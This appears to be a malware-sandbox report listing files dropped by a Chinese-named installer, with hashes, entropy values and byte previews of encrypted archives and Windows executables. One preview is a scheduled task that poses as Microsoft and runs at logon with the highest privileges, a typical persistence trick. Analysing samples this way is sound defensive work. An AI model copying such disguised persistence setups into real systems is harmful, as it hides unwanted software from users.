                      SHA-512:7FC92664D53E2E5D8F624F4AF6E902B1ECD86EFF03F8192AF09FDC5899576DDA9EC8F7DC4906237207AB758EFF4142A19DA2D8622BD329A0AA7324CC307FE695
                      Malicious:false
                      Preview:.@S.....?..,................H..v\t4..{@.Ae.RIm...w..8Q.........G..W..7..x.mX.-....Yg..x.2"l..,...yFP;...D?b.......m...!(M.Y..5.*qk..3.j.U.2......!i..$.s.I.W..i.......zQ....X..E*o.I.._..>"...O.@....S8..L1X.P....3_.C.,H`.........zmp ...x..........4_...E.`X{7.T.@e.1.>...v. .......u8.;...z...w...n.....v*.....o%...v.N](....P..2...z..G.r.^.;U/...kN....1tEn.i..F....q.u..y[.....B..%C.S3..X....B....&H.e....o.T..{...=.+6uq._..y.....i.7.%"w#...I...k.n.5..r.'l....u.......m.M.v.6.}.....U.*Jp<.}.?k... .$.*./.f!R......N....Sr......ys..&....m...'PG.:c...*f.7.....v.j.'.4.'W..$.F.g......LV...FL!!4.$QG.K..v..SZv.....{a..,u.%..{9....~MR.>..e.<.......20..GI.........x..IB.n5..C.G....@w..a......[.R.a.Y Np."........*.b...m..4P...1C...M....*.{>^..e...-c..N.BS.e...*.Wr.a._......V.Y..D.l..<;.HZ'.\.../..G.i.=......*..k...h..j.....r.%+!.V...p.vgQf....Z*.h<.Q[~g..}^.iH]..........J.<....<K.G.(.C....`....ry.....v..Wu>....r1u..ZA.".d..LAQ.F..._...#..Y&.....~.J...
                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):56530
                      Entropy (8bit):7.996846847347508
                      Encrypted:true
                      SSDEEP:1536:d3d+5x5q0iGMxg8m/iN5a2Sb+R+VgNf3Teh3k:dU5ZihSwXLRtCtk
                      MD5:406F89570AF6C412A867A8E4D82B6153
                      SHA1:8BE8D777BFB0D3FD74A143A243F87BBD647B4A0E
                      SHA-256:D5C6788AA1BA538E77DD1C26191FE9F3E9C78C080A85D903F7FD886D5ABAD25F
                      SHA-512:105181CC03B9E640164ABE7F55329F40D683540AD717501E3C5DEA283773275C3DF7D812BB888CCB10864402DB87AD1ABE9BACAC3B31C5FCF41769D769165D8A
                      Malicious:false
                      Preview:.@S.......@| ..............].!..........#Rk0cc..J...i.W.4.".....A..8c..........D..aB?....W..&....EA...z7...d_..M..%..Po..f*0n.t...IM....c.Y.D.].3W9Q...I..B..q]...'n....d%K.x..).A..l'...o..k.cR..i".X...`....R5a.....bE..U.m.U....j.(.O.a..........F"s:#Cd..SP..h1..,..X.T(...ZZ.0fn..V..:.;.....M{.GLm.o....L...sp..p...m.[.Q.....->9.m...{.UZ...p....f.;.l....G=....]....*.j.D.|yV.....2l.......^.o.|..R6.|%Hz.Xawu+..U.2.c../...C.`.O...f.......o.....5V.wB..S5..4p..2.;..q..f.Yb..d..=2.s..:....L.X..(B..F.6.am.j...P.c...*4.O.Z ...M,.!tX....=q...x.n>.C..<..8......]..".x..c.=>.l......t...(. .,......J,.Z..\.w{M..`....Z....p.6..VD..@v..G..S$K+.MLT.*eo.g.A...-.nPZ..lU9(Y....Kn..A...WvfD...*<%......8!..Q..%^"..)>XX..*A..*...$...YbE....@.C*.>.l.....;..@G._.l.-.L.x.q..n\.r_.M....YD..`x.>|....g ...J....q^.'.B@.i..0.Kq.W.........P....>.>.84.o.7z....0.8.h$b......0.D....%.*.....w..JR.7...............NJ;.......pP...|[E...4...A....x..h.T.)h+..8,G..&..k.@..y-.}..o
                      Process:C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                      File Type:7-zip archive data, version 0.4
                      Category:dropped
                      Size (bytes):56530
                      Entropy (8bit):7.996846847347513
                      Encrypted:true
                      SSDEEP:768:nJuAKIP8alGZ+u/rCpvHZIUA3xWysFN7PyhuhvbBEx7+b4TkXSycsQEnMpVb+9wm:nJuAz8rQq0vHZxO2ZMa4TxxcMpBofv
                      MD5:49B76BC1C12C1594EFAFA82A76F434A9
                      SHA1:1282B1609F0635D38D91AD3E3472FD3EAFE87703
                      SHA-256:3AEF2C31530F1EB8D4205F025C231D1B841B7D1368C1F00DDEECA329A94DAD22
                      SHA-512:09FF6AFC4E9CD9002ECCF66A02675FC5485B0D23E00B9DB5AF5BB976295DCA78D8D7C959628C4FFAE0D577A354D2B0C0E101C61A27D4C6DEACEE36DF3C8F05C6
                      Malicious:false
                      Preview:7z..'.....C.........2..........oJ...>*.......^5."?<.l.,.r.Xed6G..!G[.]k]KR.lF...},...dm.L.k..e^.3...<H../.9...3.].K......B....x.....J.5.`.H.![.7..4.w.j..6-A...F..u.*...n..;.".'>_...8]G.Tm.5..-.....4.c.)b.$wM..F..}...e\.H.G.J.B...T.K.$...b.K.}2~.........}...u..5*.6LP.3..Ou*..U....ZK...4.iGP.......wS..4@.....<..^...%fd.u..S.z.g.......X..\.x.fX..H......a(..S:...Mo..f. .......M..%~[.R%.=Pv.Y.P.MK..G.......V.X........n.8.8...C|..$...4.P.Z..PQ.)..4$n..g..J7....W..|U.h.....G...p.P..!.Hv...4PC.y..,.I..5.hv(E.^..;...0.:...5`w.....Fm}|..}.'.....6.......jBfJNJ.G..*\.Kd.4...".z..H.AL~.c...%)i.$.|..0.l...........M....9.C..O..^ ..2Kf..H...k...V....$...'.l...H}....TZ2....H..v37...........$..y....n......R...d..\...6..-..l....4.._..J.+.CwZ...0...8.#.t...E.*..v.....i.9.6...H'....L.17...CT...M.......o..xk.Y..U..wrzX.ceh5/.v...m...T..?K...Z(;.U...*...YX..f$.~.d).....fd....9.W..&...}M!dTy{`\x.......oE;..2_j.k.....P.w.Og..)C.IW.8?s.q....PC..C..p(.......s....
                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):56546
                      Entropy (8bit):7.996966859255975
                      Encrypted:true
                      SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                      MD5:CEA69F993E1CE0FB945A98BF37A66546
                      SHA1:7114365265F041DA904574D1F5876544506F89BA
                      SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                      SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                      Malicious:false
                      Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..
                      Process:C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                      File Type:7-zip archive data, version 0.4
                      Category:dropped
                      Size (bytes):56546
                      Entropy (8bit):7.996966859255979
                      Encrypted:true
                      SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                      MD5:4CB8B7E557C80FC7B014133AB834A042
                      SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                      SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                      SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                      Malicious:false
                      Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.
                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):31890
                      Entropy (8bit):7.99402458740637
                      Encrypted:true
                      SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                      MD5:8622FC7228777F64A47BD6C61478ADD9
                      SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                      SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                      SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                      Malicious:false
                      Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..
                      Process:C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                      File Type:7-zip archive data, version 0.4
                      Category:dropped
                      Size (bytes):31890
                      Entropy (8bit):7.99402458740637
                      Encrypted:true
                      SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                      MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                      SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                      SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                      SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                      Malicious:false
                      Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.
                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):74960
                      Entropy (8bit):7.99759370165655
                      Encrypted:true
                      SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                      MD5:950338D50B95A25F494EE74E97B7B7A9
                      SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                      SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                      SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                      Malicious:false
                      Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...
                      Process:C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                      File Type:7-zip archive data, version 0.4
                      Category:dropped
                      Size (bytes):74960
                      Entropy (8bit):7.997593701656546
                      Encrypted:true
                      SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                      MD5:059BA7C31F3E227356CA5F29E4AA2508
                      SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                      SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                      SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                      Malicious:false
                      Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.
                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):29730
                      Entropy (8bit):7.994290657653607
                      Encrypted:true
                      SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                      MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                      SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                      SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                      SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                      Malicious:false
                      Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.
                      Process:C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                      File Type:7-zip archive data, version 0.4
                      Category:dropped
                      Size (bytes):29730
                      Entropy (8bit):7.994290657653608
                      Encrypted:true
                      SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                      MD5:A9C8A3E00692F79E1BA9693003F85D18
                      SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                      SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                      SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                      Malicious:false
                      Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8
                      Process:C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                      File Type:7-zip archive data, version 0.4
                      Category:dropped
                      Size (bytes):249968
                      Entropy (8bit):7.999303164107084
                      Encrypted:true
                      SSDEEP:6144:K7uc9uX4FyDbSpY3S7Z/Xjm3sGhiO1E0u72BDT0BVIe9tz:UuRX4Q+ksGrTu8DTs9tz
                      MD5:F3680A817D62E5327D9AA7F965C66559
                      SHA1:9346F4AA534F1B90E9F39AE3D945195B62DC4218
                      SHA-256:39CA13B6C0C9A99BF516874DE1665E628ACC08DB2DCB8AC3C292C72FC9640C72
                      SHA-512:B2E01984421AADB6DF32D5C3A2897A43329DC359E507372E1BC89DBC8318058804D2B3A793574A9C273857A64269538A6DA5DA4076F72E17C394DF275AA979ED
                      Malicious:false
                      Preview:7z..'...G.1\........@.......3.....|...c..&....:*Y.~..e&'~O.ye.m...@.M..9..}.....[g]..%i..#T...#.6o.f.....?O....JnqK.dtJ.4RG...X.1]D..B.._7k.P.g.b.K>.V.5.Ls.Y..I....X.....xV...;bib.'q../.J+.D...p...L..+)3...4.....N>uN...^..J$.K@jc..S....+w.?.{C.$<....Qe..g...[....H.(....p.JZ8..Mm..x.'xa.A......m..ntX.e..*.50...]z.,....K7k.<....o...0...s0.p[.....o..k%...N6.....>\.=[..M.....U.bN=.*....q..y'..q.../.G!....K.z...8.W.kS..;...T.K .3|...j.l.....W.l.).DLb...".7@..|.L,...8I.6...1....c.u..n.]#.......p.~|5.a.*.`.v..&...2).)&sa.e..A........)a%Y.....\..$.h|..:..IvXV.....?.z.[....b.ULStfm...6..........<U.wX...G....G..zk.9a.g...x.`.!...G.Y5.v..;;......P#..u...x..r.....i..W..zx..)q.R.!...?..N.go..K...@...}...".BD#..^..9.=.-.3)..#..jd...>,i....vC.BG...S......f?.....k.c.p...l.".bz.{.wm..9....|/...(.x.X..Y...X..._.....8./.U.......jk..n.....cI......b.....Z..X....*J_eRi.C...p.xN_J..;.b.t.Y*...&!...-.....KH...JK)...]'W../.:.Rv....q.sh`.T.{..Gh...j[..n...|..
                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                      File Type:PE32+ executable (native) x86-64, for MS Windows
                      Category:dropped
                      Size (bytes):63640
                      Entropy (8bit):6.482810107683822
                      Encrypted:false
                      SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                      MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                      SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                      SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                      SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 3%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                      File Type:data
                      Category:dropped
                      Size (bytes):4096
                      Entropy (8bit):3.347329250663303
                      Encrypted:false
                      SSDEEP:48:dXKLzDlnbL6w0QldOVQOj933ODOiTdKbKsz72eW+5y9:dXazDlnKwhldOVQOj6dKbKsz7
                      MD5:0B22A2EDD065A1C81E971548277C256F
                      SHA1:E8C9021B2A56BD2845B2E4322A77755AE12FE197
                      SHA-256:C45C719A48CE574E67FDA9B816E972913BDCC33A5B414DFC9A31E5B55118E50B
                      SHA-512:8D36C6B062EB505CCF3B2E69307FD2526D8FD0D6DA411E8E26266ACC7DFD4B7330B01CF7161F0F8CB6B75C547A3F15525EF5DC18BB25BE34B214522D24942E95
                      Malicious:false
                      Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvai
                      Process:C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                      File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                      Category:dropped
                      Size (bytes):5649408
                      Entropy (8bit):6.392614480390128
                      Encrypted:false
                      SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                      MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                      SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                      SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                      SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):3584000
                      Entropy (8bit):7.00283805408099
                      Encrypted:false
                      SSDEEP:49152:E7vv7WClWZ7sR4YW+AKb+JE/zEVa9BKRe71MzuiehWIKxZFh2GSTujbNMLC+z/gQ:E7H77lWrYW+X4Va9BKRe71MzSRi6yQ
